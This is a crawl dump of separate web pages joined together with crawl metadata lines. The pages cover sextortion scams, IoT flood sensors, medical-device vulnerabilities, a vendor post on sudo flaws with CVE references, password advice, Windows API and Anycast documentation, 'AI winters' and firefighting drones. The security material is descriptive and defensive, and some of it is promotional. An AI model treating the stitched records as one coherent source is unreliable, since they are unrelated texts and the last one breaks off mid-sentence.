frequently change them. Enabling two-factor authentication (2FA) is another cybersecurity safeguard recommended by Cofense Labs. Many sites with 2FA send temporary access codes to a user’s smartphone. Then, even if a hacker does get the username and password to log into someone’s account, the service would recognize the hacker’s location or device and would then give a message saying the person must also enter a provided code. Other Recent Instances of Sextortion Cofense Labs’ recent work illuminates how easily hackers can use different technologies — a bot, in this case — to spread the effects of their dangerous plans. Other recent instances of sextortion show the diversity of tactics hackers sometimes use. Online gaming is giving sextortion criminals another arena they can prowl to find victims, according to a source who helps the FBI find online predators. In one sting, two dozen people in New Jersey got arrested for allegedly grooming minors for sex through games including Minecraft and Fortnite. In another instance, hackers targeted French users with malware that recorded their screens as they watched pornography. The researchers did not find evidence that the cybercriminals were threatening users with the captured material. However, they noted the same criminals recently orchestrated a sextortion attempt to blackmail victims. The cybercriminals also don’t seem to screen for people most likely to be scared by sextortion emails and pay up. For example, an 86-year-old woman received an email from sextortionists who said they had footage of her watching porn. She started getting the messages soon after signing up for a Panera Bread loyalty program that would give her freebies on her birthday. The woman said she doesn’t use the associated email and password elsewhere. Instead of feeling threatened by the hackers, the woman laughed about the incident with members of her water aerobics class. She also decided there was no way she’d pay the requested $1,400 worth of Bitcoin. A Growing Problem in the Cyberthreat Landscape Cybercriminals typically urge their victims to act quickly to avoid disastrous consequences. Sextortion works on the same principle. And, like other kinds of phishing, it often includes messages with attachments. Cofense Labs shined a light on how sextortion is becoming more widespread. Internet users need to act now to avoid being future victims. Using strong and unique passwords is essential. Additionally, if users receive email threats, they need to think carefully instead of acting out of panic. Ignoring the email is often the best decision. Kayla Matthews writes about cybersecurity and technology for publications like Malwarebytes, Security Boulevard, InformationWeek and CloudTweaks. To read more from Kayla, visit her blog: ProductivityBytes.com.
<urn:uuid:60eb8e74-2e0f-41d8-823e-275197100a63>
CC-MAIN-2022-40
https://brilliancesecuritymagazine.com/cybersecurity/cofense-labs-uncovers-large-scam-targeting-millions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00677.warc.gz
en
0.952753
1,286
2.703125
3
Students at an IoT bootcamp held at MIT have developed sensors that could help in forecasting flash floods and minimising the damage they cause. At the Massachusetts Institute of Technology (MIT), a recent six-day IoT bootcamp saw students from Turkey design an early warning system for flash flooding that could help to solve a perennial problem in their home country. Every year, flash floods cause injury and death in Turkey, along with significant damage to property and infrastructure. On the basis that preparation for those floods is key, the MIT bootcampers recognised that it’s important to figure out when and where they are most likely to occur. The secret to this knowledge, however, lies underground, in the sewers and drainage channels that run beneath a town or city’s roads and pavements, as a recent blog post from Sensora, one of the sponsors of the MIT IoT bootcamp, points out. “Armed with this information, quick action can be taken to evacuate or even protect property against flooding. The first step is to place sensors that measure these subterranean water levels and then integrate them with a system that alerts the appropriate personnel when levels reach critical thresholds.” A cost-effective response While wiring the entire underground sewer and waste water systems of every Turkish city affected would be cost-prohibitive, LPWAN connectivity – and more specifically, LoRaWAN technology – provides a more accessible way to build a flash flood early warning system, the bootcampers decided. They implemented a LoRaWAN network to power water-level sensors, each connecting to a LoRaWAN-enabled gateway. The data gathered on water levels allows for alerts to be sent via email or SMS. The students also demonstrated a traffic control scheme that green-lighted evacuation routes for traffic. This system would give people extra time to vacate dangerous areas, where necessary. “The bootcamp was a fantastic example of how IoT solutions could make an incredible impact on society,” said Vivian Li, co-founder and CSO of Sensoro, and a participant at the event. “In this particular case, it could save countless lives and injuries and help avoid or mitigate property damage.” The water-level detection system developed by students is an example of the potentially life-changing impact that the IoT and LoRaWAN-based technology could achieve. “Although the potential market space for the IoT is increasingly recognized, the general conception in terms of the potential use of the IoT remains limited”, added Li. “As well as leading the way in the technological development of the IoT, Sensoro also hopes to increase the awareness of the true capabilities of this technology across all areas of society.”
<urn:uuid:ed1b5f5d-215e-4e32-b35c-7d6ad746649f>
CC-MAIN-2022-40
https://internetofbusiness.com/bootcamp-iot-develops-sensors-flooding/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00677.warc.gz
en
0.9341
565
3.234375
3
Almost every cyberattack has the same goal — stealing someone’s money. However, as a vast variety of equipment is getting connected, a buggy device can lead to more serious consequences than money loss. What about human health and life? Take connected cars, a perfect example of how a device can pose a great risk to life and limb. A malicious party taking control over a self-driving car can easily lead to an accident. Smart medical equipment is also at risk. Devices designed to keep us healthy can be also used to do the opposite. To date, we know of zero documented cases of compromised medical equipment directly harming human health. However, experts regularly find new vulnerabilities in medical devices, including bugs that could be used to cause serious physical harm. Because stealing money and harming people physically are disparate actions, one might hope that hackers will refrain from taking such steps for ethical reasons. But it’s more likely criminals haven’t turned to hacking medical devices simply because they don’t (yet) know how to gain easy profit from such attacks. Actually, cybercriminals have repeatedly attacked hospitals with Trojans and other widespread malware. For example, in the beginning of this year, a number of ransomware infections hit medical centers in the United States, including Hollywood Presbyterian Medical Center in Los Angeles. — Kaspersky (@kaspersky) May 26, 2016 The Los Angeles hospital paid $17,000 to get its records back. However, when Kansas Heart Hospital tried to do the same, the crooks didn’t give them files back, demanding more money instead. As you can see, we cannot rely on ethical imperatives to stop criminals: Some will always be happy to attack medical establishments for easy money. Medical equipment undergoes required inspection and certification — but only as medical equipment, not as connected computer technology. Fulfilling cybersecurity requirements is recommended, of course, but remains a matter of vendor discretion. As a result, many hospital devices suffer from obvious flaws, long known to competent IT specialists. The U.S. Food and Drug Administration regulates the sale of medical devices and their certification. Trying to adapt to the evolving connected environment, the FDA released guidelines for manufacturers and health-care providers to better secure medical devices. In the beginning of 2016, a draft of a sibling document was published. But all of the measures are just advisory. So it’s still not mandatory to secure medical devices that are critical to saving human lives. Equipment manufacturers can ask cybersecurity experts for help, but in fact they often do just the opposite, declining even to provide their devices for testing. Experts have to buy secondhand equipment on their own to check how well it is protected. For example, Billy Rios, who knows connected devices inside and out, occasionally examines medical devices as well. — Kaspersky (@kaspersky) February 11, 2016 About two years ago, Rios tested Hospira infusion pumps, which are delivered to tens of thousands of hospitals around the globe. The results were alarming: The drug injection pumps let him change settings and raise dose limits. As a result, malefactors could cause patients to be injected with larger or smaller doses of medicine. Ironically, these devices were advertised as error-proof. Another vulnerable device Rios found was the Pyxis SupplyStation, produced by CareFusion. These devices dispense medical supplies and facilitate account keeping. In 2014, Rios found a bug that let anybody inside the system. In 2016, Rios turned to the Pyxis SupplyStation once more, this time with fellow security expert Mike Ahmadi. The duo discovered more than 1,400 vulnerabilities, half of which are considered very dangerous. Though third-party developers were to blame for a great number of the bugs, and experts analyzed only an older-model Pyxis SupplyStation, those vulnerabilities are still greatly troubling. Getting sick is doubly dangerous: Medical equipment is vulnerable to hackersTweet The thing is, these solutions were at end-of-life, and despite their widespread use, the developers did not provide any patches for them. Instead, CareFusion recommended customers upgrade to new versions of equipment. Organizations that did not want to upgrade received a list of tips on how to minimize the risk of those systems being compromised. It’s hard — and expensive — to update old equipment. But, for example, Microsoft had already abandoned the operating systems installed on the devices, leaving them fundamentally vulnerable. The latest versions of the Pyxis SupplyStation run on Windows 7 or later and are not vulnerable to those bugs. — Kaspersky (@kaspersky) February 10, 2016 Of course, the abovementioned cases were carried out as experiments — to show how easily criminals could repeat this if they wanted — not to cause any actual harm! Who is to blame, and what should we do? The service life of medical devices is much longer than your smartphone’s lifecycle. Dozens of years for an expensive piece of equipment is not long at all. Moreover, although the latest devices are less vulnerable than outdated ones, with time and without proper support they are going to become as buggy as their older counterparts. As Mike Ahmadi explains: “I think it’s reasonable for a medical device manufacturer to have a stated end-of-life for a medical device, and have a stated end-of-life for cybersecurity for the devices.” The Pyxis SupplyStation hack has the bright side as well. True, the developers ignored the first bugs that Rios discovered, but later, the giant Becton Dickinson corporation bought the company, and its new management views cyberexperts quite differently. Maybe in the future, companies will pay more attention to bug-proofing than they do now. And perhaps they will even do massive vulnerability testing for new devices before they enter the market.
<urn:uuid:da27f3bf-c37a-449b-8584-db0266e6854a>
CC-MAIN-2022-40
https://usa.kaspersky.com/blog/vulnerable-medical-equipment/7314/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00677.warc.gz
en
0.960972
1,218
2.75
3
How sudo Comes up Short – Open Source Support and Local AuditingIt is always a philosophical debate as to whether to use open source software in a regulated environment. Open source software is crowd-sourced and developers from all over the world contribute to packages that are later included in OS distributions. In the case of sudo, a package designed to provide privileged access included in many Linux distributions, the debate is whether it meets the requirements of an organization, and to what level it can be relied upon to deliver compliance information to auditors. The sudo package is installed locally on individual servers, and configuration files are maintained on each server individually. There are some tools such as Puppet or Chef that can monitor these files for changes, and replace files with known good copies when a change is detected, but those tools only work after a change takes place. These tools usually operate on a schedule, often checking once or twice per day, so if a system is compromised, or authorization files are changed, it may be several hours before the system is restored to a known good state. The question is, what can happen in those hours? Since sudo is an open source package, there is no official service level for when packages must be updated to respond to identified security flaws, or vulnerabilities. By mid-2017, there have already been two vulnerabilities identified in ‘sudo’ with a CVSS score greater than six (CVE Sudo Vulnerabilities ). Over the past several years, there have been a number of vulnerabilities discovered in sudo that took as many as three years to patch (CVE-2013-2776, CVE-2013-2777, CVE-2013-1776 ). The question here is, what exploits have been used in the past several months or years? There is logging within sudo, but by default these sudo logs are stored locally on servers. When advanced users are granted administrative access on servers, it is possible that log data can be modified, or deleted, and all evidence of their activities erased with very little indication that events took place. Now, the question is, has this happened, or is it continuing to happen? Large organizations typically collect a tremendous amount of data, including system logs, access information, and other system information from all their systems. This data is then sent to a SIEM for analytics, and reporting. SIEM tools do not usually deliver ‘real-time’ alerting when uncharacteristic events happen on systems, and often configuration of events is difficult and time consuming. For this reason, SIEM solutions are rarely relied upon for alerting within an enterprise environment. Here the question is, what is an acceptable delay from the time an event takes place until someone is alerted? Although sudo is a low-cost solution, it may come at a high price in a security program, and when an organization is delivering compliance data to satisfy auditors.Commercial solutions provide an effective way to mitigate the general issues related to sudo: - Solutions that offer centralized management ease the pressure on monitoring and maintaining remote systems, centralized logging of events, and keystroke recording are the cornerstone of audit expectations for most enterprises. - Commercial solutions usually have a regular release cycle, and can typically deliver patches in response to vulnerabilities in hours or days from the time they’re reported. - Commercial solutions like PowerBroker for Unix & Linux provide event logging on separate infrastructure that is inaccessible to privileged users, and this eliminates the possibility of log tampering. - Commercial solutions provide strong, centralized policy controls that are managed within an infrastructure separate from systems under management; this eliminates the possibility of rogue changes to privileged access policies in server environments. Strong policy control also moves security posture from ‘Respond’ to ‘Prevent’, and advanced features provide the ability to integrate with other enterprise tools, and conditionally alert when privileged access sessions begin, or end. Patching the HolesUntil you can replace sudo, patches are available for almost all significant server Linux distros to respond to this particular set of vulnerabilities just recently announced. If you haven’t done so, patch them immediately using Retin Enterprise Vulnerability Management. Below are the audits that map to the vulnerability, CVE-2017-1000367. These audits are available with Audit revision 3279. - CentOS: 64062 - CESA-2017:1382 - sudo Security Update - Debian: 64041 - DSA-3867-1 sudo - Gentoo: 64037 - GLSA 201705-15: sudo - Privilege Escalation - Ubuntu: 64068 - USN-3304-1: Sudo vulnerability - Slackware: 64073 - SSA:2017-150-01: sudo - Local Privilege Escalation - RedHat: 64124 - RHSA-2017:1382 - sudo security update and 64125 - RHSA-2017:1381 - sudo security update - Fedora: 64090 - FEDORA-2017-54580efa82 – sudo - Arch Linux: 64048 - ASA-201705-25: sudo Paul Harper, Product Manager, BeyondTrust Paul Harper is product manager for Unix and Linux solutions at BeyondTrust, guiding the product strategy, go-to-market and development for PowerBroker for Unix & Linux, PowerBroker for Sudo and PowerBroker Identity Services. Prior to joining BeyondTrust, Paul was a senior architect at Quest Software/Dell. Paul has more than 20 years of experience in Unix/Linux operations and deployments.
<urn:uuid:f25dd3b7-e4b6-4a40-a057-98c0bd378059>
CC-MAIN-2022-40
https://www.beyondtrust.com/blog/entry/recent-linux-vulnerability-means-time-finally-replace-sudo
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00677.warc.gz
en
0.916471
1,125
2.6875
3
With the business world now strongly present in the digital world, the use of technology in your business is inevitable. But it’s not all fairy tales and success stories when it comes to technology use in business. Over the past few years, interest in cybersecurity has grown as companies look to secure their internet and computers from digital attacks. One way you can get started on boosting your cyber security is through password protection. Below we explain what password protection is and why it is essential for your business. What is Password Protection? Password protection involves setting a password to secure a company’s data in computers, networks, or online accounts. Once a password protects the data, only the person with passwords will access the information or accounts. The need for passwords in everyday life means some people blur their importance and thus make avoidable mistakes. As such, businesses should put plans in place to sensitize employees on password protection and safe practices while using these passwords. Some ways in which you can make the most out of your password protection include: - Don’t share your password or relevant usernames with anyone. If anyone may need access to your data, be present and allow them access. - Don’t use one password for all your various data accounts, be creative and have different passwords. Also, sharpen your memory and remember all of them. - A stronger password is not only one that contains numbers, letters and symbols. Make your password even stronger by creating a passphrase unique and crazy enough to you. - Strengthen your password using the multi-factor authentication, which will require your permission from another device to grant access. Multi-factor authentication goes hand in hand with password protection, the two protection techniques help strengthen your security. The MFA uses two or more steps of verification for someone to access information or an account. OneLogin has an MFA system; the OneLogin Protect protects your company’s data and makes management easier. The system requires a person to provide a username and password and afterward allow access from the MFA app on your android or iOS phone. The second authentication process uses the one-time password method to grant access. Why You Need Password Protection Without a password, all your information will be open and available to anyone who tries to access it. In a business setting, this leaves critical data such as finances or client information exposed. Passwords are the first secure entry point to your information; therefore, anyone without it can easily experience a breach their security system. Businesses need to encourage and ensure password protection policies are part of their cyber security. That is important as employees rarely create strong passwords or manually write down their passwords which is unsafe. However, as passwords hold the foundation to cyber security over the years, hackers and other cybercriminals have found ways to get around passwords. Here are some risks to your password protection to be aware of: The top password practice is not sharing your password, which is also the easiest way to allow someone else access to your account. Cybercriminals are trying to always come up with ways to trick you into sharing your password with them. This can be through scam calls, phishing, sniffing, and keyloggers. Phishing is done by urging you to type your password or login to use other malicious websites or files. On the other hand, sniffing is when cybercriminals access networks with no encryption. Keyloggers install software or hardware on your computer or phone and use it to access your information, such as passwords. Brute Force Attacks Cyber attackers can also use some software to generate possible passwords with millions of combinations. They, in turn, use the passwords on your account until they can gain access. Most security systems can detect such attacks and block them; however, they pose significant risks. We can be our own insecurity trigger when using password protection. That can happen if you create a weak and easily guessable or crackable password. Passwords are vulnerable if you make an easily memorized password based on your interests or special dates such as your birthday. Recycling Your Password Given the different accounts that require passwords, you can find yourself reusing/recycling one password on a majority, if not all, of your accounts. That puts all your accounts at risk in case your password is cracked. To avoid this, a company should push its employees to have different work and home life passwords. Password Recovery Systems The forgot your password element on password protection systems can present a way for attackers to get your password. If the password recovery method is weak and liable to attacks, hackers can pretend to be you and access a new password to log in to your data or accounts. Benefits of Using Password Protection for Your Business Passwords can be very beneficial for your company when implemented in the best ways. Here are some benefits of password protection for your business: - With password protection and MFA, you allow instant, user-friendly and secure access to accounts or data. You won’t have to look for that piece of paper you wrote our password on for hours. - Instead of risking valuable business information, coming up with passwords keeps everyone’s work well protected beyond the administrators. - Use of passwords and MFA have also reduced the possibility of hacking and brute force attacks on companies’ data. Password protection means employees can handle more work online or via computers as the systems are already secured. Cheers to more security and productivity. Staci Jacobs is a Public Relations Specialist for OneLogin. She loves to write informative articles and share her knowledge with readers. Staci is a guest blogger. All opinions are her own.
<urn:uuid:e1a35a99-177b-4e98-8e51-2488c97a2f64>
CC-MAIN-2022-40
https://www.ccsinet.com/blog/the-importance-of-password-protection-for-your-business/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00677.warc.gz
en
0.926904
1,182
2.671875
3
Products & Services If I want to copy a password I click on the green box that says "Copy". Then I get a yellow message that says "Password copied to clipboard." That message quickly disappears. Where is the clipboard? What is the clipboard? The clipboard is a generic computing term. "The clipboard is a software facility used for short-term data storage and/or data transfer between documents or applications, via copy and paste operations." You can refer to this article for further information.
<urn:uuid:add43ac2-419e-4d54-8335-9f5fdf5be931>
CC-MAIN-2022-40
https://community.f-secure.com/en/discussion/64483/copy-where-is-the-clipboard
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00077.warc.gz
en
0.885991
111
2.6875
3
Anycast is a routing scheme that provides faster response times by routing requests to the nearest server in a group. It's especially useful for large distributed DNS applications that handle a high volume of requests. For example, DNS root servers use Anycast to distribute their service throughout the world. Although most root servers are nominally located in the United States and share a U.S. IP address, most of the physical machines are located elsewhere. Anycast assigns one IP address to multiple servers that provide the same service. A client asking for that specific IP address is directed to the geographically closest server using Border Gateway Protocol (BGP), Open Shorter Path First (OSPF), or Routing Information Protocol (RIP). BlueCat DNS/DHCP Servers use Quagga to participate in Anycast routing for DNS using one of the aforementioned protocols. For more information about Quagga, refer to Quagga documentation at http://www.quagga.net/docs.php. You can enable/disable Anycast service and configure BGP, OSPF, or RIP on DNS/DHCP Server appliances from the Address Manager user interface.
<urn:uuid:acd95fc2-bb39-42f8-8fab-222ac9a0fbf5>
CC-MAIN-2022-40
https://docs.bluecatnetworks.com/r/Address-Manager-Administration-Guide/Anycast/9.2.0
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00077.warc.gz
en
0.910229
234
2.84375
3
Is Industrial Artificial Intelligence destined for an “AI Winter”? Few areas in computer science have, over the years, repeatedly created as much interest, promise, and disappointment, as the field of artificial intelligence. The manufacturing industry, now the latest target application area of “AI”, puts much hype on AI for predictive maintenance. Will AI deliver this time, or is disappointment inevitable? In engineering, the development of AI was arguably driven by the need for automated analysis of image data from air reconnaissance (and later satellite) missions at the height of the Cold War in the 1960s. A novel class of algorithms emerged that applied back-propagation to non-binary decision trees to force convergence of input data towards previously undefined output clusters. For the first time, these algorithms, dubbed “neural networks”, had the ability to self-develop a decision logic based on training input, outside the control of a (human) designer. The results were often spectacular, but occasionally, spectacularly wrong: since the learnt concepts could not be inspected, they could also not be validated, leading to systems being “untraceable” – failures could not be explained. In the early days the computational complexity of these algorithms often exceeded available processing power of contemporary computer hardware, at least outside of classified government use. Applying AI to solve real problems proved difficult; virtually no progress was made for more than a decade – a decade that was later referred to as the first “AI Winter”, presumably in analogy to the “Nuclear Winter” and in keeping with the themes of the time. Engineers were forced to wait for Moorse’ law (which stipulated that processing power doubles every 1.5 years – a law that held through much of the second half of the 20th century) to catch up with the imagination of 1960s mathematicians. It finally did, and in the 1980s, “expert systems” emerged that revived the concepts of AI and found some notable real-world applications, although the concept of fully autonomous “learning” was often replaced by explicit human-guided “teaching”. This alleviated some of the issues posed by algorithmic untraceability, but also took much of the luster of “intelligence”. Temperatures again fell to winter levels – the 2nd AI Winter. Fast-forward another 30 years, and processing power, storage capacity, and the amount of available data have advanced to a level that might pave the way for yet another attempt at applying AI to real world problems, based on the hypotheses that more than enough data is available within any given domain to feed relatively simple clustering algorithms running on cheap and plentiful processors to create something of value. Industry heavyweights are betting significant resources on the promise of AI and have, without a doubt, demonstrated significant achievements: machines are winning against human contestants in televised knowledge quizzes and the most complex strategy games. Robot vehicles navigate highways with impressive success. It is curious that progressing these achievements to broader adoption appear to be spotty at best: applying to quiz-show knowledge management to assist doctors to diagnose medical issues appear to have failed. Taking the robot vehicle from the highway to the city high-street is fraud with autopilot upsets. The list of failed attempts at AI is longer and growing faster than the list of success stories. Is the next “AI Winter” inevitable? The fear of another winter is so pervasive among the AI research community that many avoid the two-letter acronym altogether, instead using the less loaded term of “machine learning”, or the more general “data science”. Tackling the underlying issues would, of course, be preferable to avoiding the challenges at a purely linguistic level. Confronted with an AI-based project approach, clients typically react in one of two ways. The first possible reaction is fear (the “HAL 9000” response, in reference to the bad-mannered AI protagonist in Arthur C. Clarke’s “Space Odyssey”); if not of a science-fiction induced image of evil machines exterminating mankind, then at least of job losses and unemployment due to automation replacing all machine operators, service technicians, mechanics, or other shop-floor craftsmen. The second is delusion; that there be a general-purpose machine-based intelligence that will solve all problems quickly and cheaply – after all, it also won that TV quiz show, right? Both responses, while equally wrong, are induced by the same misperception that an Artificial Intelligence and a Human Intelligence share the same type of “Intelligence” – but nothing could be further from the truth: Machines fail miserably at tasks that every 5 year old child can easily master – consider, for example, the game “Jenga”: Machine intelligence leaves us in awe due to the vast amounts of information it can retrieve, categorise, and serve. This works when the problem is contained to a narrow, well-defined domain. It appears clever, but is little more than information retrieval; there is never an “understanding” of the data, the problem, or the question asked. Moreover, there is no “creative act”. It has been proposed that it might be better to think of “AI” as “Augmented Intelligence”: AI as a means to extend the reach, availability, or precision, or an existing, human intelligence, much like glasses enhance aging human eye sight. AI assists human experts, rather than replace – or exterminate – them! Controlling the Application Domain The absence of any creative ability implies that AI systems have to learn exclusively by example, with mathematical interpolation being the only way to “fill in gaps” between examples. For this to work well, the application domain must be narrow, and the training data must be both plentiful and clean. While the amount of data needed to understand relationships between the variables obviously depends on the complexity of those relationships, the cleanliness of the data is often harder to manage. Real world data sets are full of noise – and most learning algorithms are extremely sensitive to false input in their training sets; many AI algorithms perform well in the lab, only to fail miserably in the real world when subjected to noise input data. Aside from measurement noise, changing environmental or operating conditions (“operational noise”) are also reasons for concern and failure: algorithms are forced to adapt their baseline continuously, effectively re-entering the training phase whenever such operational change occurs. In such cases, overfitting or co-linearity induced by too much data may eventually be as detrimental to the algorithm performance as too little data. Best results are therefore achieved for systems that are narrowly defined, stable, and well understood based on a clean data set derived from real-world operation. Results of high accuracy can be achieved for such systems, but be aware that uncertainties – as small as they may be – compound quickly to levels that render the final results useless when systems are composed of several such sub-systems. Artists, not their tools, make the Art Although the defining property of artificial intelligence systems is that they are able to learn unknown concepts purely based on training input, guidance by human experts greatly reduces time, the amount of required data, the danger of untraceable findings, and increases accuracy: AI algorithms are a tool in the bag of data scientists and human experts, but the latter drive the project, not the tool. Like a chisel, AI algorithms are tools that will create art only in the hand of an artist. AI projects, like any other software project, benefit greatly from an agile, iterative approach based on discussion of algorithmic data findings between the guiding data scientist with a domain expert – a physicist, design engineer or maybe the machine repairman. We wrote a previous article about the role of data science in industrial engineering. It is the skill of those domain experts that the AI system is based on; taking their input throughout the development process is as obvious as it is essential. Let the heatwave pass Can another AI winter be avoided? Hype surrounding AI has pushed the industry into a heatwave. Dropping temperatures are not only normal but also desirable and ultimately healthy. Reducing over-inflated expectations and focussing on winning the AI war one battle at a time will establish confidence: simple machine parts – such as bearings, heating elements, etc, hold the key to successful projects: predicting their failure is achievable yet yields disproportionate benefits to the overall machine operation. Optimizing process variables to reduce energy consumption has a fast, measurable positive impact on machine yield – and the operators sustainability record. Applications such as those are great success stories for a promising and valuable technology, and have great financial benefit to the users who adopt them. Ultimately these successes in the real world will ensure the temperatures will only drop to seasonal norms.
<urn:uuid:7741df89-f736-48fb-83f2-6edb8e5f2f97>
CC-MAIN-2022-40
https://www.iiot-world.com/artificial-intelligence-ml/artificial-intelligence/is-industrial-artificial-intelligence-destined-for-an-ai-winter/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00077.warc.gz
en
0.955636
1,845
2.515625
3
Creates or opens a named or unnamed event object. To specify an access mask for the object, use the CreateEventEx function. HANDLE WINAPI CreateEvent( _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes, _In_ BOOL bManualReset, _In_ BOOL bInitialState, _In_opt_ LPCTSTR lpName ); - lpEventAttributes [in, optional] - A pointer to a SECURITY_ATTRIBUTES structure. If this parameter is NULL, the handle cannot be inherited by child processes. - The lpSecurityDescriptor member of the structure specifies a security descriptor for the new event. If lpEventAttributes is NULL, the event gets a default security descriptor. The ACLs in the default security descriptor for an event come from the primary or impersonation token of the creator. - bManualReset [in] - If this parameter is TRUE, the function creates a manual-reset event object, which requires the use of the ResetEvent function to set the event state to nonsignaled. If this parameter is FALSE, the function creates an auto-reset event object, and system automatically resets the event state to nonsignaled after a single waiting thread has been released. - bInitialState [in] - If this parameter is TRUE, the initial state of the event object is signaled; otherwise, it is nonsignaled. - lpName [in, optional] - The name of the event object. The name is limited to MAX_PATH characters. Name comparison is case sensitive. - If lpName matches the name of an existing named event object, this function requests the EVENT_ALL_ACCESS access right. In this case, the bManualReset and bInitialState parameters are ignored because they have already been set by the creating process. If the lpEventAttributes parameter is not NULL, it determines whether the handle can be inherited, but its security-descriptor member is ignored. - If lpName is NULL, the event object is created without a name. - If lpName matches the name of another kind of object in the same namespace (such as an existing semaphore, mutex, waitable timer, job, or file-mapping object), the function fails and the GetLastError function returns ERROR_INVALID_HANDLE. This occurs because these objects share the same namespace. - The name can have a "Global\" or "Local\" prefix to explicitly create the object in the global or session namespace. The remainder of the name can contain any character except the backslash character (\). Fast user switching is implemented using Terminal Services sessions. Kernel object names must follow the guidelines outlined for Terminal Services so that applications can support multiple users. - The object can be created in a private namespace. If the function succeeds, the return value is a handle to the event object. If the named event object existed before the function call, the function returns a handle to the existing object and GetLastError returns ERROR_ALREADY_EXISTS. If the function fails, the return value is NULL. To get extended error information, call GetLastError.
<urn:uuid:1e473cb8-b180-4cf4-8f3c-d3e6d70ac872>
CC-MAIN-2022-40
https://www.aldeid.com/wiki/CreateEvent
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00077.warc.gz
en
0.694661
700
2.59375
3
Keep Safe Online News stories about high-profile data breaches, cyber attacks, ransomware and phishing campaigns targeting both large organisations and SMEs, bring the importance of online security to the attention of the general public, but for millions of unsuspecting home owners and small businesses, it is often too late. Being secure online doesn't have to be a burdensome task and it doesn't have to take up much time. It doesn't have to cost a lot of money either, as long as a few basic rules are implemented and maintained. On this page: The Costs of cyber crime 90% of large organisations and 74% of SMEs had a security breach in 2015, as the Department for Business, Innovation & Skills’ 2015 Information Security Breaches Survey revealed. According to Get Safe Online, UK businesses reported a total loss of over £1bn in 2015. This figure could be even higher, as it doesn’t include unreported losses. Action Fraud received over 37K online crime reports, a 22% increase from 2014. Gemalto’s Data Security Confidence Index shows what companies faced as a result of being breached: 92% suffered negative commercial consequences that impacted 4 key areas: productivity, reputation and clientele, business, and legal. Since January 2016, 557,964 unique phishing attacks have been reported, according to the APWG Phishing Activity Trends Report – the largest volume ever tracked by the company. Resources to keep you safe online Below are some free online resources that any small business or home owner will find useful: getsafeonline.org – Free objective advice, sponsored by the UK Government and leading businesses. actionfraud.police.uk – How to protect yourself and react if you think you are a victim of online crime. financialfraudaction.org.uk – UK banking industry initiative to help online banking users stay safe online. ico.org.uk – The UK’s independent authority set up to uphold individuals’ information rights. Read our blog for daily news about data breaches and cyber attacks >> Online security for SMEs In 2014, the UK Government launched the Cyber Essentials scheme with the aim of providing a clear statement of the basic controls that all organisations should implement to mitigate the risk from common internet-based threats. Implementing the scheme’s five security controls can protect organisations from around 80% of cyber attacks. Read more about the scheme >> The UK Government is urging SMEs to adopt basic cyber security hygiene to secure their most valuable assets – namely, information, data and reputation. According to KMPG research, UK SMEs are careless when it comes to cyber security. Half of them think “it’s unlikely or very unlikely that they’d be a target for an attack”. But, in reality, they are undervaluing their commercial value. Download this guide to discover: The consequences SMEs face if they become victims of a cyber attack; How Cyber Essentials helps SMEs strengthen cyber security and improve business efficiency. Download this free guide >> Online security for individuals Online security is essential for individuals and businesses alike, but without adequate knowledge and awareness security will always take a back seat in favour of other priorities, such as maintaining adequate cash flow (in the case of the smaller business) or feeding the children (in the case of the homeowner). There is a direct correlation between the level of security people have at home and the level of security they have at work. It is often the case that when an organisation implements an information security awareness programme, people take the information on board and follow through at home. Read more about information security awareness >>
<urn:uuid:2ed354b4-a792-41ff-a55c-7b49b813ff6d>
CC-MAIN-2022-40
https://www.itgovernance.asia/keep-safe-online
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00278.warc.gz
en
0.931495
787
2.578125
3
When a fire is raging, time is of the essence. Speed of response and having the right equipment needed at the scene can be the difference when saving a home, or more importantly, a life. Drone technology is now playing a vital role in assisting firefighters. Let’s explore some of the ways that fire departments are using UAVs (Unmanned Aerial Vehicles) to go beyond the boundaries of distance, terrain, and altitude to assess an emergency quickly and accurately. Enhanced Situational Awareness For firefighters, running into a burning building can often mean running into an unknown situation. However, UAVs are helping to reduce the unknowns for firefighters through real-time visibility and aerial intelligence. Firefighters use drones equipped with infrared and thermal cameras to identify a fire’s exact location. Thermal aerial visibility can help guide firefighters to safe entry points and inform routes before entering an unstable building. The UAV can view how the fire is spreading and identify new areas to avoid. For significant fire events, including building collapses, plane crashes, and wildfires, getting complete visibility of a scene is critical to understanding containment and any additional hazards before approaching. Firefighters can quickly get full visibility of a situation that could otherwise take several hours to assess, with resources that are a fraction of the cost of helicopters to operate. Drone as a First Responder By deploying a drone in response to a 9-1-1 call, an agency can more quickly size up and understand an emergency, enabling them to make quick and accurate decisions and better inform the response. For example, scene assessments are traditionally conducted from the ground when a fire department gets a call. With UAVs, firefighters can get a full aerial view of the scene and quickly determine and allocate needed resources almost instantly. Firefighters can better decide whether they need to either escalate a call to a two-fire alarm and have the next closest fire station assist. Additionally, drones can help fire departments assess if a call-in is an actual fire or not. Dispatching a UAV to get a quick view is extremely valuable for agencies that cover rugged or remote terrain. A report of smoke on a mountainside can be quickly validated with a drone, ensuring departments marshal an appropriate response — or none at all, keeping resources ready for the next emergency. With tools like geofencing and obstacle avoidance, a firefighter can safely fly a UAV close enough to see into the windows of a burning building, helping to find anyone who may be in danger without worrying about colliding into the building. Quickly identifying where people are trapped on each floor can help firefighters determine their plan of attack, and increase the odds of getting everyone out safely. Aerial intelligence from UAV technology provides a new level of situational awareness and greater visibility to support the quick and accurate decision-making 